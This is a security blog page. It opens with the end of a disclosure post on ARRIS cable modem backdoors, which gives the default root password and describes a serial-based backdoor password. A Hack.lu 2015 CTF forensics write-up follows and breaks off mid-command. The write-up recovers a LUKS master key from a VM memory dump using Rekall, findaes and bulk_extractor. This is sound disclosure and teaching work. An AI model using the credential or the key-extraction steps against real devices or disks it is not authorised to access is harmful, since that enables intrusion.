<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjemB850vbkdZWkGoSl7YJ-22TKpSL96_Q6hEo-RcioPXQQlsDEanu1IJZRuP3-PiGTmHnb2uK2m4ZN1zluM5qRBu3_GQK_3cc5ZIakLPlx_fxdvraWPY0f0gk8BxtfleI_fsGb8aRXO6de/s1600/Screenshot-Touchstone+Technical+Support+-+Mozilla+Firefox.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjemB850vbkdZWkGoSl7YJ-22TKpSL96_Q6hEo-RcioPXQQlsDEanu1IJZRuP3-PiGTmHnb2uK2m4ZN1zluM5qRBu3_GQK_3cc5ZIakLPlx_fxdvraWPY0f0gk8BxtfleI_fsGb8aRXO6de/s320/Screenshot-Touchstone+Technical+Support+-+Mozilla+Firefox.png" width="320" /></a></div>
<br />
<br />
The default password for the SSH user 'root' is 'arris'. When you access the telnet session or authenticate over SSH, the system spawns the 'mini_cli' shell asking for the backdoor password.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixPktk_PtOAJbOuyAVdZ3yFkRnPxky8UBoIMNZ_lVTPrM4D8PA_Q4fBZvR370ArT69HY9s75H9KqTNcgKZb-XsLKkFdvgIfjRcDrpw5EGeDtXCIehXtge8DIO2iMS3MVBzHgn7fNzEJ3mN/s1600/telnet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixPktk_PtOAJbOuyAVdZ3yFkRnPxky8UBoIMNZ_lVTPrM4D8PA_Q4fBZvR370ArT69HY9s75H9KqTNcgKZb-XsLKkFdvgIfjRcDrpw5EGeDtXCIehXtge8DIO2iMS3MVBzHgn7fNzEJ3mN/s320/telnet.png" width="320" /></a></div>
<br />
When you log using the password of the day, you are redirected to a restricted technician shell ('/usr/sbin/cli')<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXde-7avcrF8JuOgZcMTNWbd_I7RZqq3xVPIvp20YQwUjJDZ6DItcgH-YuYq6qbNi0hOzjwXFA0P9D5HhZ-nLcXSn0E58OTfg3ljDss5hEmyHueTSFBXKd15HSsokEejblXyvWWlgVvry/s1600/restricted0.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDXde-7avcrF8JuOgZcMTNWbd_I7RZqq3xVPIvp20YQwUjJDZ6DItcgH-YuYq6qbNi0hOzjwXFA0P9D5HhZ-nLcXSn0E58OTfg3ljDss5hEmyHueTSFBXKd15HSsokEejblXyvWWlgVvry/s640/restricted0.PNG" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Restricted shells are ;restricted<br />
<br /></td></tr>
</tbody></table>
In order to understand how the backdoor works, I built an <a href="https://github.com/bmaia/cross-utils/tree/master/armeb/puma5_toolchain">Puma5 toolchain (ARMEB)</a> and cross compiled some useful tools like strace, tcpdump and gdbserver. I hosted them on my Github, get them here:<br />
<br />
- <a href="https://github.com/bmaia/cross-utils/tree/master/armeb">https://github.com/bmaia/cross-utils/tree/master/armeb</a><br />
<br />
While analyzing the backdoor library and the restricted shells, I found an interesting code on the authentication check:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_agXnv9q39vTkihZeG2zA__Hg98TmkXDSN2BJ-OcEs9N2SPFbEHwASsE-xg0VSy7TleVBUb5qDfW-SHq3-XN9D-EeVT5VR9xdNCqlA9cHLEeS5r4T0XXHWVbA3kKfElvNfJnSlYJEgn0D/s1600/backdoors-final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="332" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_agXnv9q39vTkihZeG2zA__Hg98TmkXDSN2BJ-OcEs9N2SPFbEHwASsE-xg0VSy7TleVBUb5qDfW-SHq3-XN9D-EeVT5VR9xdNCqlA9cHLEeS5r4T0XXHWVbA3kKfElvNfJnSlYJEgn0D/s640/backdoors-final.png" width="640" /></a></div>
<br />
<br />
Yes, they put a backdoor in the backdoor (<a href="http://www.devttys0.com/2013/10/reverse-engineering-a-d-link-backdoor/">Joel from Dlink</a> is sure to be envy). The undocumented backdoor password is based on the last five digits from the modem's serial number. You get a full busybox shell when you log on the Telnet/SSH session using these passwords.<br />
<br />
The vendor asked not to disclose details about the password generation algorithm. I'm really relieved knowing that <a href="https://twitter.com/todb/status/648956328292057088">those awful guys from Metasploit</a> won't be able to reverse this in a timely manner.<br />
<div>
<br /></div>
<br />
<b>Vulnerability, Disclosure and Marketing</b><br />
<br />
Of course, we need a logo so the media can report about this with fancy graphs as well as vendors could distribute customized t-shits at Blackhat.<br />
<br />
What I like most about <a href="https://twitter.com/lcamtuf">lcamtuf</a> is how visionary he is. While people were still writing dumb fuzzers, he <strike>wrote AFL</strike> performed a detailed <a href="https://lcamtuf.blogspot.com/2015/01/technical-analysis-of-qualys-ghost.html">Technical analysis of Qualys' GHOST</a>. Based on his analysis, I hired a couple of marketing specialists to find out the best way to disclose the ARRIS backdoor.<br />
<br />
What do we have here?<br />
<br />
- Multiple backdoors allowing full remote access to ARRIS Cable modems<br />
- An access key that is generated based on the Cable modem's serial number<br />
<br />
After a thoughtful analysis, the marketing committee advised w00tsec members to write a <a href="https://en.wikipedia.org/wiki/Keygen">Keygen</a>. In order to write a Keygen, we need a leet ascii art and a cool chiptune. The chosen font was <a href="http://sourceforge.net/p/ansiconverter/blog/2014/07/thedraw-fonts-collection-revamp-and-extension/">ROYAFNT1.TDF</a>, from the legendary artist <a href="https://en.wikipedia.org/wiki/Superior_Art_Creations">Roy/SAC</a> and the chiptune is <a href="https://www.youtube.com/watch?v=Syc2NnPNnZs">Toilet Story 5</a>, by <a href="http://modarchive.org/index.php?request=view_profile&query=68760">Ghidorah</a>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52m8nmtqwpv81CAJTFNO_FfA53tsy8xfhXc3ajp-9eFQwcN4MRO7Z84NFiCEcCn8pb4gf-L9NGNLnD6ZD_KI3-4dQfo_qxPyzS-qgENQA_jUyjkkGau-qeaFL54mPj_-G1t7ZMj8Kwu8n/s1600/run2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="444" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg52m8nmtqwpv81CAJTFNO_FfA53tsy8xfhXc3ajp-9eFQwcN4MRO7Z84NFiCEcCn8pb4gf-L9NGNLnD6ZD_KI3-4dQfo_qxPyzS-qgENQA_jUyjkkGau-qeaFL54mPj_-G1t7ZMj8Kwu8n/s640/run2.png" width="640" /></a></div>
<br />
<br />
Here's the POC (make sure you turn the sound on):<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/pmKd69-KyhQ/0.jpg" frameborder="0" height="400" src="https://www.youtube.com/embed/pmKd69-KyhQ?feature=player_embedded" width="660"></iframe></div>
<br />
<br />
<b>Conclusion</b><br />
<b><br /></b>
I reported these flaws to <a href="https://www.cert.org/vulnerability-analysis/">CERT/CC</a> on 2015-09-13 but we didn't receive much feedback from the vendor. <a href="https://www.cert.org/vulnerability-analysis/">CERT/CC </a>was very helpful and responsive (10/10 would disclose again!). I was asked not to release the POCs immediately so I'm going to wait for the vendor to "fix" the issue.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg21on-hp0FKuTFjaK44eA0tprc7XFbQHXakWyJwUl4ZzKXT0zz-NNoFBjNdByaAXBRZ8N0XiLaoz4OljfxeWUpqN4LxQpJLwPLBfyHtctuU02BRYbBB5iLWIW78J3wuxwywBsMs2WdYNyO/s1600/tweet2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg21on-hp0FKuTFjaK44eA0tprc7XFbQHXakWyJwUl4ZzKXT0zz-NNoFBjNdByaAXBRZ8N0XiLaoz4OljfxeWUpqN4LxQpJLwPLBfyHtctuU02BRYbBB5iLWIW78J3wuxwywBsMs2WdYNyO/s400/tweet2.png" width="400" /></a></div>
<br />
CERT/CC set a <a href="https://www.cert.org/vulnerability-analysis/vul-disclosure.cfm">disclosure policy of 45 days</a> long ago. They waited for more than 65 days for them to "fix" it but ARRIS didn't remove the backdoors in a timely manner. Someone needs to update the Responsible Disclosure RFC and include a note describing that vendors shall lose disclosure points whenever they plant a backdoor on the device (ARRIS modems have a third backdoor too, check the <a href="http://console-cowboys.blogspot.com/2014/09/arris-cable-modem-backdoor-im.html">ConsoleCowboys Blog</a>).<br />
<br />
I'm pretty sure bad guys had been exploiting flaws on these devices for some time (just search for <a href="https://twitter.com/search?q=arris%20dns&src=typd">ARRIS DNS on Twitter</a>, for example). We need more people bypassing EULAs and reversing end-user software and firmware. If you haven't heard about the <a href="http://firmware.re/">Firmware.RE</a>, check them right now. A broader view on firmwares is not only beneficial, but necessary to discover new vulnerabilities and backdoors, correlating different device families and showing how vulnerabilities reappear across different products.<br />
<br />
To all the vendors out there, I would like to finish this post by quoting <span id="goog_1417640033"></span><a href="https://twitter.com/daveaitel">@daveitel</a>:<span id="goog_1417640034"></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://www.csoonline.com/article/2997254/security-industry/hacked-opinions-the-legalities-of-hacking-dave-aitel.html"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0BFFktJ7D1B-rwLN0dxGctcRTxtoh5yJr3rSasQ9R1ZICOCf9xP-4fJB0GPPgCkxS0kL_WrsTHoHJDy2eWgj_3-7QeGUIl-fqeGgsikDKPrWHd9h0wbt_Z6UsaVUyVU4cJrHve8FxYFw5/s400/knowing.png" width="400" /></a></div>
<br />Bernardo Rodrigueshttp://www.blogger.com/profile/09470949514402700579noreply@blogger.com199tag:blogger.com,1999:blog-3296471108082693838.post-1288766731761081932015-10-22T06:02:00.001-02:002015-12-09T01:03:30.457-02:00Hack.lu 2015 CTF Write Up: Dr. Bob (Forensic 150)<a href="http://2015.hack.lu/ctf/">Hack.lu 2015 CTF</a> was organised by <a href="https://twitter.com/fluxfingers">fluxfingers</a> during October 20-22. It's one of the coolest CTFs around, the only drawback is that it runs during week days (hey guys patch this for the next years). My team <a href="https://ctftime.org/team/10288">TheGoonies</a> ranked #59th, which is not bad considering we only played part-time.<br />
<br />
The task Dr. Bob was the one I found most interesting as it included disk forensics, memory forensics and basic crypto tasks.<br />
<br />
<b>Task: Dr. Bob (Forensic 150)</b><br />
<br />
<div class="code">
There are elections at the moment for the representative of the students and the winner will be announced tomorrow by the head of elections Dr. Bob. The local schoolyard gang is gambling on the winner and you could really use that extra cash. Luckily, you are able to hack into the mainframe of the school and get a copy of the virtual machine that is used by Dr. Bob to store the results. The desired information is in the file /home/bob/flag.txt, easy as that.</div>
<div>
<br /></div>
<div>
<div>
Download: <a href="https://school.fluxfingers.net/static/chals/dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz">dr_bob_e22538fa166acecc68fa17ac148dcbe2.tar.gz</a></div>
</div>
<div>
<br /></div>
The file provided is a VirtualBox image in a saved state. According to the challenge instructions, we have to retrieve the flag from the user home folder. The VM starts on a login terminal of what seems to be a Linux distro.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA9LgGtbusmtCdFiFBvM4bwV53YXgkU5CkxUeus7-EqI5MrZ3a3YZjZNgu8SVPuUreGy80cW2CxDeaOMNMGIATPSx_BMfWvrg_sjP7Lhh1VnjW9M0OZZfVHOv6RkFp_-sVFcSVdrinCLyp/s1600/distro.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="262" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiA9LgGtbusmtCdFiFBvM4bwV53YXgkU5CkxUeus7-EqI5MrZ3a3YZjZNgu8SVPuUreGy80cW2CxDeaOMNMGIATPSx_BMfWvrg_sjP7Lhh1VnjW9M0OZZfVHOv6RkFp_-sVFcSVdrinCLyp/s400/distro.PNG" width="400" /></a></div>
<br />
The easiest route here is to convert the VDI image to raw, mount and extract the key from the home folder. VirtualBox has a builtin tool to convert VDI to raw and it's as simple as:<br />
<br />
<div class="code">
C:\Program Files\Oracle\VirtualBox\VBoxManage.exe internalcommands converttoraw c:\ctf\home\dr_bob\.VirtualBox\Safe\Safe.vdi c:\ctf\safe.dd</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieW4xnYmhDDvM_jiEwRzjW6q1QlQaQS7MIOm0wDs1nSphTYKuMHG6NpNUCWlPbTHzSfvjBiIAh03EeGm-VcmxtJI_ehChD7WqxYnAtiDLMkXdUx0nqhzvYJPNONddnOgzfEjY8lz53wvem/s1600/dd.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="85" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieW4xnYmhDDvM_jiEwRzjW6q1QlQaQS7MIOm0wDs1nSphTYKuMHG6NpNUCWlPbTHzSfvjBiIAh03EeGm-VcmxtJI_ehChD7WqxYnAtiDLMkXdUx0nqhzvYJPNONddnOgzfEjY8lz53wvem/s400/dd.PNG" width="400" /></a></div>
<br />
Let's identify the raw image and mount it externally:<br />
<div class="code">
sudo fdisk -lu safe.dd
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxhdRwQOuwSPK1FQjMDogf7Q8J2XNfme3W2riGyqTwkzUsFiaFwW7YOoEwpDsTkaHHiEQd3byEXJw8BVlcSbh5NaaY07QwmwO6Rgr5w9943sDbKqgW-rbSDJqZBTPGvCwoJ7F7I1VYk26l/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxhdRwQOuwSPK1FQjMDogf7Q8J2XNfme3W2riGyqTwkzUsFiaFwW7YOoEwpDsTkaHHiEQd3byEXJw8BVlcSbh5NaaY07QwmwO6Rgr5w9943sDbKqgW-rbSDJqZBTPGvCwoJ7F7I1VYk26l/s400/Screenshot-Terminal.png" width="400" /></a></div>
<br />
<div class="code">
sudo losetup -o 1048576 /dev/loop0 safe.dd</div>
<div class="code">
sudo lvmdiskscan</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit1VKx-zL4oAMcfL9lxUVD42bwEUEl5CDsdrqxAECRMam_Hl0gSxahx-UfcAJ7kV3ClclRhWSuVuYGuhupV1zK3a-pEmyZMavdaSGym3ndO5AbZTUjhR8of7xNDMIQ7sqBI5ppU4BY7P12/s1600/Screenshot-Terminal-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEit1VKx-zL4oAMcfL9lxUVD42bwEUEl5CDsdrqxAECRMam_Hl0gSxahx-UfcAJ7kV3ClclRhWSuVuYGuhupV1zK3a-pEmyZMavdaSGym3ndO5AbZTUjhR8of7xNDMIQ7sqBI5ppU4BY7P12/s400/Screenshot-Terminal-1.png" width="400" /></a></div>
<br />
There are two interesting devices: /dev/vg/root and /dev/vg/home, let's 1 - mount the home folder, 2 - grab the flag and 3 - PROFIT!!!<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EyxMQvGBcoaKBuqZfca4Y6WgDpsenDuxEyYaX4Ytzq8oX28y-nq7Th78UtalXTI2XzieyQAeoq7_muE_cbUz0GecjuPf1lE_2Xoc9Q-7fztMgkMk9WS0e4P_wBT5GkGExhuDfmwqERVX/s1600/disk.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6EyxMQvGBcoaKBuqZfca4Y6WgDpsenDuxEyYaX4Ytzq8oX28y-nq7Th78UtalXTI2XzieyQAeoq7_muE_cbUz0GecjuPf1lE_2Xoc9Q-7fztMgkMk9WS0e4P_wBT5GkGExhuDfmwqERVX/s320/disk.png" width="320" /></a></div>
<br />
Oh noes, the disk is encrypted... I couldn't find any useful data on the root device (/dev/vg/root). I tried to crack some local password hashes but I didn't get anything and logs/history files didn't reveal any secrets. Time to unleash some CSI skills and perform live memory forensics.<br />
<br />
<b><br /></b>
<b>Memory Forensics: Rekall</b><br />
<br />
Unlike VMWare virtual machines, VirtualBox does not offer an easy-to-use memory dump (as far as I know). What do we do now? It's time to perform <a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">VM introspection with Rekall</a>.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPtFXqZn0MXBPyiMhYYNfQuHpMwfgCRFg8AAfzXJFoZvIoso0pz15obvB9MRVKhIzMFWlrAV7ecBtgdTExD0FrMZdm2hrzQ3w0kecAqCTXCRYj8FI-freCaOf42olh6ejgr67RTHPMhkjk/s1600/inception.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPtFXqZn0MXBPyiMhYYNfQuHpMwfgCRFg8AAfzXJFoZvIoso0pz15obvB9MRVKhIzMFWlrAV7ecBtgdTExD0FrMZdm2hrzQ3w0kecAqCTXCRYj8FI-freCaOf42olh6ejgr67RTHPMhkjk/s400/inception.jpg" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Memory Analysis Inception</td></tr>
</tbody></table>
Rekall is the first memory framework to support transparent introspection of VMs with any host-guest OS combination and is independent of the virtualization software layer.<br />
<br />
<b><br /></b>
<b>Building the Profile</b><br />
<b><br /></b>
Linux support in Rekall requires a tailoured profile to the running kernel as well as the System map file. The profile file contains all the debugging symbols extracted into a Rekall standard profile format. To generate this file, it is necessary to build a kernel module with debugging symbols enabled, and then parse the DWARF debugging symbols.<br />
<br />
The operating system is a Debian 7.9 i686, with 3.2.0-4-486 Kernel.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGALulCSGZ7IzFhzjXMIie6Jajjd7-5cWiA_A-xHJ55VgCAOjyOd5MCD_1sFtCDgyvBtiwMp6DJwl4CCkGTtHF2uP2XHgkcfUY74Vn_-6ovzhSRiDCYd7umJDSdHTWiPjPv0x7PTf0gB9f/s1600/deb.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="122" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGALulCSGZ7IzFhzjXMIie6Jajjd7-5cWiA_A-xHJ55VgCAOjyOd5MCD_1sFtCDgyvBtiwMp6DJwl4CCkGTtHF2uP2XHgkcfUY74Vn_-6ovzhSRiDCYd7umJDSdHTWiPjPv0x7PTf0gB9f/s400/deb.png" width="400" /></a></div>
<br />
The <a href="https://github.com/google/rekall/tree/master/tools/linux">Linux Guide</a> from <a href="https://github.com/google/rekall/tree/master/tools/linux">rekall repository</a> is pretty straightforward. I downloaded a <a href="http://cdimage.debian.org/cdimage/archive/7.9.0/i386/iso-dvd/">Debian 7.9 i386 ISO</a>, installed it on a clean system, installed the Kernel headers from the target VM and built the corresponding profiles. I mirrored them here:<br />
<div>
<ul>
<li><a href="https://github.com/bmaia/rekall-profiles">https://github.com/bmaia/rekall-profiles</a></li>
</ul>
</div>
<div>
<b><br /></b></div>
<div>
<b>Memory Analysis Inception</b></div>
<br />
Now that we have the proper profile, we can run VirtualBox, start the VM and perform live forensics on the guest machine.<br />
<br />
The <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/VmScan.html">vmscan plugin</a> scans the physical memory attempting to find hypervisors and group them together logically as virtual machines.<br />
<br />
It's possible to run plugins on any VM by using the --ept (<a href="http://www.rekall-forensic.com/posts/2014-10-03-vms.html">Extended Page Tables</a>) parameter on the command line. To run a rekall plugin on a VM that vmscan found, invoke rekall as you normally would, but add --ept EPT_VALUE as a parameter.<br />
<br />
<div class="code">
rekal -f \\.\pmem vmscan --live</div>
<div class="code">
rekal.exe -f \\.\pmem --profile Debian-3.2.0-4-486.zip --ept 0x1ECC0701E</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJa8lNUqxgifyzKQvYdQxmV9mQx4PxK-f1XUmsZ4O1PL3-e3GjtcB7EwReS6K9D74l3ykRtrecFssdXKH4vr3MGZuotcP_9bJL2yG_tsx4Ewcpu1Khh73FYTHKDghll7Xl1M8LvWMiT1V/s1600/success.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcJa8lNUqxgifyzKQvYdQxmV9mQx4PxK-f1XUmsZ4O1PL3-e3GjtcB7EwReS6K9D74l3ykRtrecFssdXKH4vr3MGZuotcP_9bJL2yG_tsx4Ewcpu1Khh73FYTHKDghll7Xl1M8LvWMiT1V/s400/success.PNG" width="400" /></a></div>
<br />
I tried to use the base <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/Linux/">Plugins that supports Linux analysis</a>, but none of them revealed the secrets necessary to decrypt the disk.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSbILjB-Jq6FRmFnJ3e5I-FBAAXYUeS0Ba2WPreXj8qZSrssu60O5XAWHl_qtQNd0X3KYbrQYKVYGBG0PQb_5QlTUWI4pkWe45Uv3WAGq2-kpSpVGfk0TojCNZhL-MKocZMcLV0QVMFcR4/s1600/netstat.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSbILjB-Jq6FRmFnJ3e5I-FBAAXYUeS0Ba2WPreXj8qZSrssu60O5XAWHl_qtQNd0X3KYbrQYKVYGBG0PQb_5QlTUWI4pkWe45Uv3WAGq2-kpSpVGfk0TojCNZhL-MKocZMcLV0QVMFcR4/s400/netstat.PNG" width="400" /></a></div>
<br />
After some time I decided to take a different approach and <a href="http://www.rekall-forensic.com/docs/Manual/Plugins/General/ImageCopy.html">dump the full memory</a> from the Guest VM and carve for some secrets.<br />
<br />
<div class="code">
imagecopy output_image='memdump.raw'</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhub2zDrEtysN4TqxCcA1vsW2UR5wRa2H3KNfuXlrxmgqbQu-SMIYngq4B5pTykO2KpQVdaGuxPa1f9c5nyAoR2Sm6shJGwIEOb19DunTkwPf3gyXy9YhqdtkqlbShpoJdX5QgxoViDemSb/s1600/memdump.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="150" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhub2zDrEtysN4TqxCcA1vsW2UR5wRa2H3KNfuXlrxmgqbQu-SMIYngq4B5pTykO2KpQVdaGuxPa1f9c5nyAoR2Sm6shJGwIEOb19DunTkwPf3gyXy9YhqdtkqlbShpoJdX5QgxoViDemSb/s400/memdump.PNG" width="400" /></a></div>
<br />
<b><br /></b>
<b>Extracting AES Keys from the Memory Dump</b><br />
<br />
You can use tools like <a href="https://github.com/simsong/bulk_extractor">bulk_extractor</a> and <a href="http://jessekornblum.livejournal.com/269749.html">findaes</a> to extract AES keys from memory dumps. These programs work by carving the images and eliminating anything which is not a valid AES key schedule.<br />
<br />
<div class="code">
./findaes memdump.raw</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85uGmZxI0mNp9ijeV_JG_nFPsqf_hmlzTLZXLAx4DMOiEASS0vbhin_KuHw3-E8y_o-7W9_geI2CtrWGu0qad4lSDW7MDdHqobTRqIHOHHI4fWXc2GB6eoBz01jqBnRbliBicNyu5icbT/s1600/findaes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="83" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi85uGmZxI0mNp9ijeV_JG_nFPsqf_hmlzTLZXLAx4DMOiEASS0vbhin_KuHw3-E8y_o-7W9_geI2CtrWGu0qad4lSDW7MDdHqobTRqIHOHHI4fWXc2GB6eoBz01jqBnRbliBicNyu5icbT/s400/findaes.png" width="400" /></a></div>
<br />
The tools found an AES-128 key, and I now needed to recreate this behavior on a lab to make sure that it was the encryption master-key. I set up an encrypted volume on a Debian installation and dumped the master keys using cryptsetup:<br />
<br />
<div class="code">
cryptsetup luksDump --dump-master-key /dev/sda5</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk-qX5BH7tuIJ7iC_RdcSAwIkdqSjuDX7g6V2Ksl3tDamM1Ob2RiGIlxXN-8h-Y4GIssf5q2p7jyqc4kCmbilEgCreIcOIQ4uhx6n4flNaHphyEirQQw4GtgaVV7sbE4jVgLpP_vMDcQ1D/s1600/b1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="268" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk-qX5BH7tuIJ7iC_RdcSAwIkdqSjuDX7g6V2Ksl3tDamM1Ob2RiGIlxXN-8h-Y4GIssf5q2p7jyqc4kCmbilEgCreIcOIQ4uhx6n4flNaHphyEirQQw4GtgaVV7sbE4jVgLpP_vMDcQ1D/s400/b1.png" width="400" /></a></div>
<br />
After that, I dumped the operating system memory and used bulk_extractor to search for AES Keys:<br />
<br />
<div class="code">
bulk_extractor memdump.raw</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsXLkaYDQZnnMkHHDph0CiX3pLjxM_78Z1jxfmGihfqLvZygS1FUUzgHkwZ_vBwmy_ZAgDmYyXJisflgbkUwOZMAkdpzlZjiKZPuzhyC92QjyIOzNSbzJ8gQyz7iXQn-Wz2lK5usYW4yUV/s1600/b2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="173" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsXLkaYDQZnnMkHHDph0CiX3pLjxM_78Z1jxfmGihfqLvZygS1FUUzgHkwZ_vBwmy_ZAgDmYyXJisflgbkUwOZMAkdpzlZjiKZPuzhyC92QjyIOzNSbzJ8gQyz7iXQn-Wz2lK5usYW4yUV/s400/b2.png" width="400" /></a></div>
<br />
The AES256 key matches with the MK dump, what brings us to the final step.<br />
<br />
<b><br /></b>
<b>Decrypting LUKS volume using the Master Key</b><br />
<br />
Now that we have the AES Key, all we need to do is follow this guide - <a href="http://b87.nl/cryptsetup-and-the-master-key">Cryptsetup and the master key</a> - and decrypt '/dev/vg/home'. There's no command-line to decrypt the disk using the master-key, everything is kind of hackish (you need to corrupt the headers and create a new one using the key).<br />
<br />
<div class="code">
sudo losetup -o 1048576 /dev/loop1 safe.dd</div>
<div class="code">
cryptsetup -v luksDump /dev/vg/home</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw3QROA9R_xNlUSQSf7iIDJZif0ELeJmq-1h7D5uuvM3AztFG7cRrdkyCPrfhEJnaEwRldrQ7KFX4YRXGoWsdCInJIpz2Oj3MEejmZAu32SubNBnpoPZyHU_YNHRP1ICYgyBxMPZI3lsgz/s1600/Screenshot-Terminal-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhw3QROA9R_xNlUSQSf7iIDJZif0ELeJmq-1h7D5uuvM3AztFG7cRrdkyCPrfhEJnaEwRldrQ7KFX4YRXGoWsdCInJIpz2Oj3MEejmZAu32SubNBnpoPZyHU_YNHRP1ICYgyBxMPZI3lsgz/s400/Screenshot-Terminal-2.png" width="400" /></a></div>
<br />
The Master Key (MK) has 128 bits, which is a good sign. The payload offset is 2048 and we need to do some basic math here to get the LUKS header size: 2048 * 512 / 1024 = 1024 (fdisk -l shows that the cluster size is 512 bytes).<br />
<br />
We now proceed to write a new LUKS header on the device using the extracted MK, assigning a new passphrase:<br />
<br />
<div class="code">
dd if=/dev/vg/home of=test.img<br />
hexdump -C -n 80 test.img<br />
